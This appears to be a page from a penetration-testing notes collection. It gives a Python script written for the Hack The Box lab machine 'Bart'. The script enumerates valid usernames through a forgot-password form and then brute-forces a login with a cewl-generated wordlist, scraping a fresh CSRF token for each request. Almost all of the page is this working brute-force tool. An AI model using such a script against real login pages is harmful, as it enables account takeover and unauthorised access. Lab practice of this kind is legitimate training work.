Creds BruteForce CSRF Handling

import requests
from bs4 import BeautifulSoup

pw_forget_url = 'http://bart.htb/monitor/?action=forgot'
url = 'http://monitor.bart.htb'

f = open("users")
lines = f.readlines()

p = open("cewl-wordlist.txt") # cewl -w cewl-wordlist.txt -e -a http://forum.bart.htb
plines = p.readlines()

# Create a session to maintain cookies
s = requests.session()

proxies={"http":"http://127.0.0.1:8080"}


def user_brute():
    users=[]
    for line in lines:
        username = line.strip() # to remove the new line char from each username
        response = s.get(pw_forget_url, proxies=proxies,verify=False)
        if response.status_code == 200:
            # Parse the HTML content using BeautifulSoup
            soup = BeautifulSoup(response.text, 'html.parser')
            csrf_input = soup.find('input', {'name': 'csrf'})
            
            if csrf_input:
                csrf = csrf_input['value']
                #print(f'CSRF token value: {csrf}')
            else:
                print("CSRF token input not found in the HTML.")
        else:
            print(f"Failed to retrieve the page. Status code: {response.status_code}")

        forget_pw = {"csrf":csrf,"user_name":username}
        r = s.post(pw_forget_url,data=forget_pw,proxies=proxies,verify=False)

        if "An email" in r.text:
            print(f"[+] User found: ",{username})
            users.append(username)

    return users

username = "harvey" # after running the user_brute func, we will get 2 legit usernames which i chose harvey in our case but we can brute force the other user's pw if we didnt get harvey's

def pw_brute():
    pw = ""
    response = s.get(url, proxies=proxies,verify=False)
    for line in plines:
        pw = line.strip()
        if response.status_code == 200:
            # Parse the HTML content using BeautifulSoup
            soup = BeautifulSoup(response.text, 'html.parser')
            csrf_input = soup.find('input', {'name': 'csrf'})
                
            if csrf_input:
                csrf = csrf_input['value']
                #print(f'CSRF token value: {csrf}')
            else:
                    print("CSRF token input not found in the HTML.")
        else:
            print(f"Failed to retrieve the page. Status code: {response.status_code}")

        forget_pw = {"csrf":csrf,"user_name":username,"user_password":pw,"action":"login"}
        r = s.post(url,data=forget_pw,proxies=proxies,verify=False)
        if "The information is incorrect." not in r.text:
            print("[+] Password Found:  {}".format(pw))
            return pw      
        
    return False


#user_brute()
pw_brute()

PreviousNoSQL REGEX Password

Last updated